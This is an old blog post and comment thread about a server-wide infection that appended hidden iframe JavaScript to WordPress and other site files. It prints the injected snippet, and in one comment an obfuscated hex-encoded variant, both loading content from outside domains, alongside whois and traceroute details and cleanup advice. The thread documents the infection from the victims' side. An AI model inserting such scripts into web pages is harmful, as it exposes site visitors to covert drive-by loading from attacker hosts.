Just discovered this by accident. My server files have been infected with a piece of javascript code that sends the information to a certain site. This is certainly a first.
How can you check this?
The virus attacks following files on your server:
- index.php
- index.html
- main.php
- header.php
- footer.php
At the end of these files it will insert the following code:
<script language=javascript>status=location;document.write ('<iframe src="hххp://online-channels.info/in.cgi?traf" width=0
height=0 frameborder=0 display:none onLoad="status=defaultStatus;"></iframe>');</script>
Update: if you use WordPress read how to check WordPress sites.
What it does?
I can only guess. The code is calling a script on online-channels.info site. It can be sending traffic information. Maybe it is a first case of Internet marketing espionage? Or it can be trying to run some malicious code.
How did it come here?
It can be a security flaw on my hosting server. It can be a security flaw of the WordPress which is the main script I run on my server.
Whatever way it came, it executed code that scanned through all the files on my server that match the given names and added that code at the end.
All created files carry the time stamp 29-06-2008 04:59 which is the time when the attack occurred.
How did I discover it?
By accident. I was looking at the HTTP requests on my site using Firebug. I noticed few 404 Object not found errors. Normally I keep my blog in good shape and these things should not happen.
I then suspected that some of the plugins I use reference this site. After inspection I could find the script inserted to a number of plugins.
I have then checked my theme - it was there too in the index, header and footer. I then checked the whole WordPress installation - the script was there.
Finally I discovered it was spread out on my whole server.
The lucky thing is the attacker's site broke down so I could find an anomaly with that 404 error.
Who is behind it?
I am still not sure. Here is the domain registration record for online-channels.info
Domain ID:D23976304-LRMS
Domain Name:ONLINE-CHANNELS.INFO
Created On:29-Feb-2008 23:08:51 UTC
Last Updated On:22-Jun-2008 11:24:52 UTC
Expiration Date:28-Feb-2009 23:08:51 UTC
Sponsoring Registrar:Blog.com Digital Communications Inc. (R315-LRMS)
Status:OK
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676
The site is registered somewhere in Denmark under an anonymous name. Blog.com is mentioned as Sponsoring Registrar.
The server IP is 78.109.22.246 and is located in Ukraine.
Trace route finishes before getting to the site:
11 86 ms 83 ms 83 ms tr1-v23.de-fra.datagroup.ua [217.28.250.42]
12 114 ms 107 ms 107 ms tr1-v454.ua-kiev.datagroup.ua [80.91.160.205]
13 691 ms 611 ms 131 ms cat65-ge1-2-datagroup.hosting.ua [194.54.91.130]
14 * * * Request timed out.
What can I do?
You should check the files on your server for the code. Check index.php and index.html first as they are most likely to have been infected.
Warn your friends about it.
See also:
- Check your WordPress site for viruses and malware
- WordPress Security How To
- Low Bounce Rate WordPress Themes
Posted in: WordPress
TAGS:check attack sites, check virus plugin, check viruses, check website virus, checking virus, heder php virus, how check virus, how virus check website, how virus come websites, how wesite viruses attack, search websites malicious script, virues websites, virus attack website, virus websites, web virus, website virus test
Hi! My name is 
56 Comments
Thanks a lot. Finally i've found an article that really helps me with viruses' problem. My Wordpress engine working bad last time and i can't even imagine where i'll find a problem but now it's ok and i'm glad to find such informative articles and thanks to kind people who helps us.
Thanks Vladimir! It's great and helpful information for all website owners.
Help me to check my website virus ?
thanks
Hello!
You can ask your host company, they can run a scan on your files.
Otherwise you can download your website, and run a scan on it to check for viruses. It should be able to remove the virus and then you can upload the clean file(s) again.
However, if there is really a virus on your server, then only the host company can help you, the should also install a firewall.
One of my friend's site is infected by GNU GPL virus. which has added js at the end of page.
is there any online scanner? is there any alert system which will give email whenever site is infected?
share & shine.
cs
hi,
i have been having problems with facebook for a few days now,It lets me sign on to my account but doesnt allow me to do anything else.. Do i need to delete my account. i have a variety of virus checkers such as AVG and COMODO firewall but neither have picked up any issues with the site. i would really appreciate your help as it is starting to bug me.
I think my site has been hacked as i could not log in to admin section.Each time i tried, the login redirects to myndomain.com and i my broweser would froze away. I checked index.php and i found , which i have removed but the problem still remains. Any help would be appreciated.
You could try exploit scanner plugin mentioned in the article.
I wish i could try the explit scanner on if i could log in. My site wp-admin log is redirecting to myndomain.com anf would just freeze the browser.
i am ssssoo frustrated right now because i am a newbie and i dont really know what to do and WHAT TO LOOK FOR. i dont know what to do. my blogs are infected according to some blogger friends. but im not using wordpress...am using blogspot.
is it possible that the virus came from those clickables? or adsence? advertizers? im afraid to move right now. but i think im losing friends, im losing opps...and my computer's getting affected. help me? anyone?
what's the best anti virus then? i have avg, and to try and upload mcafee. what of my sites? do i need to delete and start over?
There is very slim, if any chance of having a blogspot blog infected. Probably it is a false alarm
hi,
We had a case of this iframe virus, (cleaned files changed ftp details upto now its good) we also noticed a page drop on google, my question is does this virus play a key role in google page/rank drop issues,..?
Thanks
Saj
The common source of infection is ftp username and passwords. if your site in infected change all your ftp accounts password. look for some javascript code or some iframe in index.php, header.php, footer.php
remove those code.
every thing will be fine.
there is no way of geting rid of this virus, i tried everything, but by accident i discovered, by going into your plesk, reboot your website, and the virus will disapear for 3 days, then it kicks in again, so i reboot every 2 days to make sure it stays where it is until we can find a guaranteed way of eliminating the virus,
Hi have the same problem, what i did is scan all the file on server, chnage the ftp details and puted all form with some restriction
Hello, I was having the same problem which all you faced. I have 19 Sites running and they were on different servers and hostings but all they got infected. I later found out the way to solve the problem and how we can save us from all that bloody attacks.
I have written a post about the thing that how to save your site from attacks.
check here http://imagine18.com/2009/07/is-your-site-infected-with-iframes-hacks-and-exploits/
tanks
I have a couple sites and the virus got on to all my sites that were in my filezilla.
I had to replace the whole folder or one of the files would just redo all the file and add the follwing piece of line to my index files.
Solution: Change all ftp passwords, replace all files on ftp.
Make sure to backup from here on out!
I have mutiple sites, windows and linux alike. PHP boards, shoppingcarts, flash, html, etc Every one of my sites hosted on godaddy. Every one had the index and logon files replaced with a code similar to the one above added. I found it near the header on the html's and at the bttom of the php files. All replaced on every site the same day and minute. I have replaced them all 3 times now and there is no end in site. Godaddy said "update your PH. we don't suport open source...blah blah" I'm using html and falsh as well ya know.......argh I'm gonna hunt this down until I find the bleeps.
This isnt only a wordpress problem, but a cms problem.
I have 14 joomla sites that have all been infected and have been researching as to how and why.
Appearantly if your site has been hacked it caused by a sniffer virus on your local pc. Essentially everytime you connect to your ftp, the virus reads all of the ftp login credentials and then posts the results to someone somewhere. Then a bot of some kind posts the script to all of your index.php and index.html files. In my particular case its a different script than the one posted above. It is so incredibly frustrating.
I do know that if you have been comprimised, be sure to clean your pc completely and change all of your ftp passwords. What i am trying to find is a way to scan the files and remove the script from all of the files without having to do it manually...14 sites =not enough time in my life..
Can anyone suggest a program or way to scan the files of websites remotely or locally for a specific script and remove them automatically?
Thanks in advance!
I was woundering if you ever fix your sites. I had same problem and agree with you with stolen ftp information, I'm using joomla and wordpress and all sites got hack with this iframe exploit and since this code are in so many files what I did is use a search and replace software to scan all the files with same type of code and deleted and one big problem we face is that if we have exploit scripts in our websites at the end of the line our sites will be blacklisted from search engines :-(
This sounds a lot like what happens to all of my pages with the name 'index'. Any of my members who used AVG virus protection get an ugly attack message and can't enter my site. The odd thing is that it doesn't seem to cause any problems if you don't have AVG. It seemed to happen about every 4-6 weeks where it would insert code at the end of these index pages. I seem to have solved it by renaming my index pages 'default' .
*cheers*
Really it is nice information.But I want to know wheather there is any option to protect against these infected files automatically?
Really it is nice information.But I want to know wheather there is any antivirus to protect against these unwanted script inserted files.
Nice post. my blog is also infected with a malware. This has a script similart like this inserted in many of my plugins, themes, wp-config and so on.
i have remove the scripts manually many times (by replacing everything with a fresh copy)but the very next day they appear at the same files. What might be the problem? please help me out.
Happened here too. Like a previous poster, with a GoDaddy site.
I removed all files. Then uploaded a backup. It too became infected immediately. Gave-up, deleted all files, except for a re-direct index.php. It takes about 24 hours for it to become infected.
I just keep going back in and removing the script.
Hi Ron
If you use wordpress then check this article http://www.prelovac.com/vladimir/wordpress-security-notes
Otherwise you'd probably need to hire someone
Vladimir,
Can you check or tell me how we can get our website checked for virus? we don't have a webmaster per se and are getting McAfee not testing indications on Google and Yahoo listings.
Thanks,
Ron
817-412-0505
o.k post. most of them are infected with these leechers.the best way is to check index.html on server file regularly. i think by this way we can stop virus attacking.
Wow, i ve same trouble too.
My Site was added some script by Mr.X like this
"".
For the first time I think thats my faults on copy paste script during coding. I had asking to my server site provider, they use Linuk as they Operating System and virus can not attack they server, as they say. It mean virus run at local machine, not attacking to the server. Is it ?? If run on local machine, how we can detect that ? with symantec ?? ha ha...
@Lee - I suggest using exploit scanner plugin - it can go into the database for you
My sites were hacked...
I just cleaned what seemed to be 100's of pages on a few of my sites.
The java code to remove was on most of my sites index pages
I have removed it all (I hope and think)
But, what I'm wondering is, if it can get into my mysqual database
My hosting company has been very little help. I also cannot access my database, so that's why I am wondering if it can be in there as well (or it could be a simple me not remembering my password). If so, will it not just reinfect the index pages again?
Hi Im lost I have a few questions is there anybody I can email my questions to one-to-one?
Thank you for your time.
Ter
not working...
http://dhost.info/hasan
Well, some pages worked but when I went to HOME - several times,(http://www.prelovac.com/vladimir/) this is what I've got (no joke)! Or you think I'm fooling you around?!
How did you write that comment then? :)
Oops... where is the hyperlink to the image? Never mind, it's here:
http://i281.photobucket.com/albums/kk210/planetasrbija/untitled_screen.jpg
It seems that you still have some problems?! Look what I've got when browsing your website:
thanks for the information.
hope this help in my problem...
My Site, got infected with (Exploit.HTML.Iframe.FileDownload)
How to Identify the file that beeb infected. in my site, the index.html are 3 in separate folder.
Okay wanted to add this.
I noticed that the injection infects the main folder of the server. and goes one directory deep to infect another file.
/index.html
and
foldername/index.html
but wont go deeper than that. Good for me since many folders have indexes in deep folders.
I plan on in the future to not have index files in the first sub folder if this keeps up.
What hosting provider do you all use?
I noticed on my 2 servers both hosted on godaddy. That all my files titles Index.php or html, main, login have all been effected by a code injection. To compare notes here is what mine reads..
I removed script start and end from the copy and paste.
I hope this helps someone outthere. Oh 1 server runs Joomla on it. The other on Hml and Php scripts.
function xy1q48773ca845b80(q48773ca846354){ function q48773ca846b1f () {var q48773ca8472ee=16; return q48773ca8472ee;} return (parseInt(q48773ca846354,q48773ca846b1f()));}function q48773ca847abe(q48773ca8484a8){ var q48773ca8499fc=2; var q48773ca848a5e='';q48773ca84a99e=String.fromCharCode;for(q48773ca84922d=0;q48773ca84922d<q48773ca8484a8.length;q48773ca84922d+=q48773ca8499fc){ q48773ca848a5e+=(q48773ca84a99e(xy1q48773ca845b80(q48773ca8484a8.substr(q48773ca84922d,q48773ca8499fc))));}return q48773ca848a5e;} var q48773ca84b16e='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533362533332533362533392532392532622532372533322533302532372532302537372536392536342537342536382533642533312533312532302536382536352536392536372536382537342533642533352533372533392532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q48773ca847abe(q48773ca84b16e));
Using the .htm suffix instead of .html does not stop anything.
i'm seeing this on a joomla site
I maintain my business website and have a similar virus. I use a commercial host who denies any virus on my website.
Nearly all of the index.html and index.php have the added code. The code is different from the one shown here. This code has a long string of numbers in it.
I would like to ask if anyone has had success using just the index.htm ?
I am going to replace some of my index files with that extension since some files I cleaned and replaced online were reinfected.
Thanks, for all the information put on this page.
I may let you know if changing the html to htm works.
Dave (The Other One) - love that redirect and I totally agree that they need what that page is offering!!
Hi, Thanks for the info. I would like to contribute info regarding the Regisrar - Blog.com.
Allmost all new .info domains with Directi(ResellerClub) shows the Sponsoring Registrar as Blog.com.
I have blogged on my site on this if interested. http://indika.info/2008/07/15/domain-registrar-changed-to-blogcom/
I have Wordpress 2.5.1 installed. I tried replacing the index files (in root,wp-admin, and deleted all of my themes in wp-content and recreate them new) and that seems to be doing the trick...
Until this morning it came back again. All the index.php files has been injected again with the script so I will have to do the same thing. Is there anyway to prevent some modifications done on the index.php files? I changed the permission to those files to 644, but I''m not sure if this is going to fix it permanently.
is this website (www.priceclub.ae ) infected by virus...?
please ensure me that website infected by virus or not...
pleaseeeeeeeee.
thanks,
DHrub
Removing them from the files is what I did, nothing much left I am afraid expect from contacting your hosting company and warning them. Also make sure you upgrade everything to latest versions (WordPress especially).
Hi there, I stumbled upon your site from googling. It seems my website also was injected by these files, although so far I only found them in the 3 index.php files located in the Wordpress directory.
I was wondering what I should do in this case. If I downloaded those 3 index.php files and remove the scripts, upload them back, will it actually solve the problem because I've been looking around and it seems they got injected back within a day. I also wanted to change the password on all my account, but I dont know if that is going to solve anything.
Any of you have any ideas? Thanks for the heads up definitely.
Creative, indeed :)
Hi Vladimir,
It's definitely a Wordpress related issue. I've had the same problem on several of my blogs and on client blogs I'm hosting. The issue arises from wp-register.php which is deprecated but redirects to wp-login's register function. Although I see you have user registration turned off here, I would recommend going an extra step and altering your wp-login where you see this :
case 'register' :
if ( !get_option('users_can_register') ) {
wp_redirect('wp-login.php?registration=disabled');
exit();
}
replace it with something like this...
case 'register' :
wp_redirect('http://some-other-url-here.com');
exit();
I have been very creative withmy redirect and send these hackers to a Clickbank offer that they probably need. You can see it by checking the link to my wp-register.php...
http://www.affiliatebestprograms.com/wp-register.php
:-) :-)
No, it is a linux server.
Vladimir are you running windows server?
FYI, just did a tracert on that domain and it went to 203.117.175.107 - looks like a moving target!
Vladimir, thanks so much for this warning - I'll post a note on the Authority Blogger forum about it, to refer people to your post for the details.
Thanks for the heads up. I'll look for those malicious codes in my files tonight. I hope I'm not infected or something.